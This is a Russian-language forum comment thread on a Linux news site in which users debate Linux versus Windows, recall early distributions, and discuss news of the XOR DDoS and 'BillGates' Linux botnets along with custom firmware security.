Так я реально заметил, экономию сил, средств и времени в своей личной и профессиональной жизни!
:)

Ваша оценка: Нет Средняя оценка: 1 (1 vote)
a

Анонимов уважаю, ибо с 2010 лично поддерживал "великий" THE PLAN!
:)

Мой первый Linux в далёком 1999 году занимал 6 трехдюймовых дискет, ставился на раздел с FAT16 и запускался из MSDOS командой loadlin.exe. Ядро 1.0 с чем-то, в комплекте были иксы (modeline для своего Cirrus Logic в /etc/X11/XF86Config считал и прописывал вручную:) и в качестве браузера — Mosaic. Если говорить о первом User Friendly — это был Mandrake 7, компакт с которым попал в руки спустя год-два. Первая винда была 3.1 for workgroup году в 93. Вроде могу сравнивать и то, и другое объективно — третий десяток лет за компом:) И свою первую любовь — полуось помню, и BeOS и много чего ещё.

Согласен и тут, но какой ценой — проще?

В винде временами реально не хватает всякой юниксовой мелочи, идущей штатно в комплекте. Скачать порты с gnu.org не проблема (хотя порта того же dd под винду нет и не будет), но обнаруживать отсутствие нужной прямо сейчас утилитки на чужой машине бывает досадно.

Ваша оценка: Нет
6

И при всем, эта самая "школота" не создает обширные бот-неты?
При этом всем, не страдает жлобливыми форумными посиделками, оля " где мне скачать ключик, на мой любимый Nero(подставить по вкусу...)"!?
И даже при юзании Ubuntu Linux, "школота" эта, изучает хоть и в мизерном количестве, но все же и архитектуру ОС и пытается запомнить нужные команды в терминале!

Ваша оценка: Нет
a

Ботнет из Linux-устройств разросся настолько, что может генерировать атаки с потоком более 150 Гбит/с, что многократно превышает запас прочности инфраструктуры среднестатистической компании. О начале подобных DDoS-атак сообщили исследователи из Akamai Technologies.
Сетевой червь, более известный как XOR DDoS, при помощи которого и был собран ботнет, выявили еще в сентябре 2014 года. Исследователи из Akamai Technologies утверждают, что последние DDoS-атаки ботнета имели «мощность» от нескольких, до 150 Гбит/с, а нападению подвергаются до двадцати целей в сутки. Пока основной удар принимает на себя азиатский регион — более 90% целей ботнета XOR DDoS находится именно там. Атакуют, в основном, компании работающие в сфере онлайн-игр, а также образовательные учреждения.
XOR DDoS является одним из нескольких сетевых червей, которые нацелены конкретно на Linux-системы. Деятельность группы, управляющей зловредом, отражает общую тенденцию по инфицированию оборудования и использования этих мощностей для проведения, в первую очередь, DDoS-атак. Наиболее уязвимыми являются плохо или вовсе не настроенные должным образом системы, а так же «заброшенное», но подключенное к сети оборудование. Исходя из статистики последних двух лет, последнее в особенности касается маршрутизаторов.
«Десять лет назад Linux позиционировался как безопасная альтернатива Windows, которая в то время серьезно страдала от атак, львиная доля которых приходилась именно на это семейство ОС. Из-за этого Linux все чаще и чаще применялся и применяется для повышения уровня информационной безопасности, но поскольку сфера применения этой системы расширилась, расширились и возможности киберпреступников. Сейчас злоумышленники активно развивают тактику и инструментарий для атак на Linux-системы, поэтому системные администраторы и специалисты по безопасности должны ужесточать свою политику на местах», — прокомментировали в Akamai Technologies.

Ваша оценка: Нет
6

Ботнет из Linux-устройств разросся настолько

А что было до 2014 года, приведите плизз — данные по количеству малых и средних ботнетов из десктопов под Windows, чтобы можно было найти "среднюю температуру по больнице"?

злоумышленники активно развивают тактику и инструментарий для атак на Linux-системы, поэтому системные администраторы и специалисты по безопасности должны ужесточать свою политику на местах

А это — обратная сторона всей IT, если бы у легендарных QNX и Open BSD, был бы такой же рост на дешевых китайских роутерах, то мы бы в 98% случаев видели бы тоже самое...:(

Ваша оценка: Нет
a

Если конкретно мой линуксовый сервак попадает в ботнет — я реально должен радоваться, что виндовых или там макинтошных машин в других ботнетах больше? Просто непонятно.

Ваша оценка: Нет Средняя оценка: 2 (1 vote)
6

2 звезды, ибо — реально нет, и это не зависит от Вас лично, в прямом смысле!:) Это зависит и от подготовки создателей ботнета, и еще от нескольких тысяч других причин. Реально не зависит от Вас, также то, что когда вы можете попасть под дождь, а потом подхватить воспаление легких, или все же — это зависит от вашего организма, и плохой реакции иммунной системы, на внешние воздействия?

Ваша оценка: Нет Средняя оценка: 1 (1 vote)
a

Что-то не слыхал я про ботнеты на базе Cisco IOS и прочих серьёзных железках. Хотя ддосить врага с захваченного магистрального роутера — это же просто мечта:) Всё остальное ломается примерно с одинаковой лёгкостью. Я уже упоминал линуксовый ботнет BillGates, цитирую хабр:
"На днях начальница пригнала своего сынишку поучиться уму-разуму, а так как дарование впервые видит серверную ОС, то решение учить пацана выпало на старый ubunt-овский сервер с LAMP-ом на борту (Linux + Apache + MySQL + PHP). Благо на нем тестируют проекты перед показом в свет.
После вводных лекций и кучи выданной макулатуры на сервере был создан новый недоюзер, который благополучно был добавлен к зоопарку SSH, и присвоен стандартный пароль в виде «Thispasswordiscrypt». В процессе обучения недоюзеру надоело вводить длинный пароль и он без ведома сменил его на «fack_off». В то время мы проходили бэкапы БД и выборочно сервера, но по каким-то богу известным причинам под его учеткой не завелось восстановление БД. Не сильно парясь, я добавил ему повышенные привилегии. Теперь все ОК, начальница в ажуре. Так как мама рядом, и курить нельзя, то на перекур хожу только я, а он грызет гранит науки.
На следующий день от планктона пошли заявки о медленно работающем, а то и совсем не работающем интернете. Перерыл все, но проблему так и не нашел. Поскольку тестировщики гоняли тесты на злополучном сервере, я не заметил процесс, пожирающий свободный ресурс.
Ближе к вечеру, а именно обедом, когда все в прострации и ничего не делают, все таки заметил причину падения всемирно-глобальной сети под название Интернет. Как выяснилось позже, сын начальницы осознал вину и пришел с покоянием, попутно рассказывая, что сменил свой пароль к учетке, обновил apache и копался в настройках ssh.
Исходя из исходных данных удалось установить, что прокси боты сканят ssh и попутно подбирают пароли. Поскольку у юного дарования оказался логин user, а пароль «fack_off», то на сервер попал бот. Судя по забекапенным логам, или того, что попало в логи, бот просканировал запущенные сервисы и, если находил apache, то цеплял на него прокси сервер, а потом подгружал сам модуль ботнета от дядюшки Билли."
Легко заметить, что линукс от тупой прокладки между креслом и клавиатурой машину не спас:) А времена когда пользователи линукса в основной массе были квалифицированнее виндовых уже давно прошли.

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
6

5 звезд, уважаю человека читающего Хабр!
:)
но если уж покопаться в прошивке роутера (выбрать для начала правильное железо...), или поставить прошивку от энтузиастов, как я сделал со своими девайсами: от роутеров WiFi — до смартфонов на Android (перелопатил за 17,5 часов две сервисных прошивки 4.4.4 и 5.02 недавно и повыкидывал из них все, что "сливает" Google, затем забэкапил все это — в трех местах, на случай ядерной войны)! Что мне не мешало, так сделать: лень или узость мышления, или еще чего-нить там...?

Ваша оценка: Нет Средняя оценка: 1 (1 vote)
a

А где гарантия что прошивка от энтузиастов в бинарном виде будет чистая? По уму — надо брать дерево исходников и проверять строчку за строчкой, а потом самому же и собирать, поскольку исходники на сайте могут лежать одни, а на сборку пойти совсем другие:) Чисто навскидку заглянул сейчас на Github, качнул оттуда android_device_motorola_msm8226-common-cm-11.0. 44 папки, 241 файл, общий вес содержимого чуть меньше 2 с половиной мегов — и это только небольшая часть всего проекта, написанная минимум на трёх языках программирования (не считая make:). Потом неплохо бы не только ось, но и входящий в комплект софт аналогично проверить. А когда жить-то?

Ваша оценка: Нет
6

исходники пакетов я смотрю только сигнатурно и конечно не своими глазами, а через анализаторы "на отдельной ферме", что критично (модули отдельные и т.д. и то, что я знаю лично) — изучаю путем тотального дизассамблера, который у меня даже на Pebble имеется в рабочей версии его прошивки... конечно — это не гарантия 100%, но лучше чем или ничего, или использование коммерческих, копирастных продуктов!
:)

Ваша оценка: Нет
a

Под линукс я давненько ничего не писал, но насколько помню — там с этим было не лучше чем со всем остальным. И если сорцы можно даже в nano набивать, а компилить и собирать со всякими gcc и make, то с отладкой и дизассемлированием было всё плохо: gdb в смеси с ldb, strings и прочими readelf — это процентов 10 от функционала и возможности IDA Pro. Который под линуксом тоже есть — но не бесплатный и не open source, а потому жадные дети скачут по форумам и торрентам в поисках крака либо ломаной версии не хуже виндузовых:) Как скакали за тем же NeroLinux и платными линуксами, будь то Mandriva Powerpack, Corel Linux Deluxe и прочими Lindows.

Ваша оценка: Нет
8
dk

Ну а в чем тогда ценность данного вируса как такового? Разве что некоторая автоматизация процесса.

Ваша оценка: Нет
Отправить комментарий
КАПЧА
Вы человек? Подсказка: зарегистрируйтесь, чтобы этот вопрос больше никогда не возникал. Кстати, анонимные ссылки запрещены.
CAPTCHA на основе изображений
Enter the characters shown in the image.
Linux I класса
Linux II класса
Linux III класса
Счетчики
  • Самый популярный сайт о Linux и Windows 10
О Либератуме

Liberatum — это новости мира дистрибутивов Linux, обзоры, сборки, блоги, а также лучший сайт об Ubuntu*.